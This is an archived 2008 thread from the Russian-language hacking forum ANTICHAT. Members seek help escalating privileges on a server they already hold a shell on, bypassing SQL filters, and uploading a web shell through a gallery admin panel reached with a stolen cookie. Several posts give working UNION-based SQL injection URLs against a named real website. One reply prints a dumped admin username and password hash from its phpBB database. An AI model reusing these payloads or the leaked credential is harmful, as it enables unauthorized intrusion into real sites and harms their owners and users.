ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

07.05.2008, 23:44
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 303
Провел на форуме: 811764
Репутация:
119
|
|
Сообщение от Sharingan
какие есть возможные способы поднять права?
Можно узнать пасс админа и права поднимутся 
Заюзать сплойтенг, которые сделает тебя рутом =)
|
|
|

07.05.2008, 23:47
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме: 1050662
Репутация:
435
|
|
мне нужно именно знать какие есть сплойты, какая инфа нужна для того что бы проверить реально ли воспользоватся данным сплойтом, просто хочу что бы все было быстро и оперативно.
|
|
|

07.05.2008, 23:51
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 303
Провел на форуме: 811764
Репутация:
119
|
|
Sharingan, знаешь какая ОС? 
Можно поискать под конкретную версию + сплоит под сервисы, которые крутятся на машине
|
|
|

07.05.2008, 23:59
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме: 1050662
Репутация:
435
|
|
FreeBSD 6.2-RELEASE-p5
Server: Apache
safe_mode: OFF PHP version: 4.4.7 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
если на таком шелл стоит реально ли права поднять?
|
|
|

08.05.2008, 00:04
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 303
Провел на форуме: 811764
Репутация:
119
|
|
Сейф мода нет...дас ист гут 
Вот, поищи тут:
http://milw0rm.org/search.php
Лучше в поиск вбивать названия демонов 
|
|
|

08.05.2008, 00:07
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
Кто нибудь подскажет как обойти фильтр последовательности union select from?
----------------------------------
https://forum.antichat.ru/thread56409-sweb.html
читал, но вопрос остался
Последний раз редактировалось samarin; 08.05.2008 в 00:14..
|
|
|

08.05.2008, 01:11
|
|
Новичок
Регистрация: 25.11.2007
Сообщений: 9
Провел на форуме: 107030
Репутация:
1
|
|
Hi All
Такой вопрос зашёл в админку Coppermine Photo Gallery через куку админа такой вопрос как лучше залить шел ? заранее спасибо !!!
http://forum.antichat.ru/threadnav59410-1-10-Coppermine%2BPhoto%2BGallery.html
|
|
|

08.05.2008, 23:56
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме: 1050662
Репутация:
435
|
|
касательно сообщение #1921 так и не нашел сплойта, может кто что посоветует ?
|
|
|

10.05.2008, 02:27
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
кароче я все подставил как мне человнк подсказал и получилось)) вот что получилось http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,usr_emai l,usr_psw,15,16,usr_id,18+from+users+limit+1,1/*
Собственно я сразу побежал в админку http://r-est.biz/admin вроде как не получилось войти (катогория админки не та вроде как) кароче я решил ломануть ихний phpbb форум. подставил все вроде правильно но чето не высвечиваеться пароли((
http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,username ,user_password,15,16,user_id,18+from+phpbb_users+l imit+1,1/*
вот колонки phpbb
http://r-est.biz/?r=nj&n=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14 ,15,16,column_name,18+from+information_schema.colu mns+where+table_name=0x70687062625f7573657273+limi t+1,100/*
Подскажите если не трудно
|
|
|

10.05.2008, 05:33
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
diznt
не трудно..)
http://r-est.biz/?r=nj&n=-http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,table_schema+from+Information_schema.tables +where+table_name=%200x70687062625f7573657273+limi t+0,1/*
http://r-est.biz/?r=nj&n=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,concat(user_id,0x3a,usern ame,0x3a,user_password),null,null,null,null,null+f rom+restbi_bb.phpbb_users/*
admin;e816c860394f9fb51eed8d902a569e5d
Последний раз редактировалось sabe; 10.05.2008 в 06:34..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|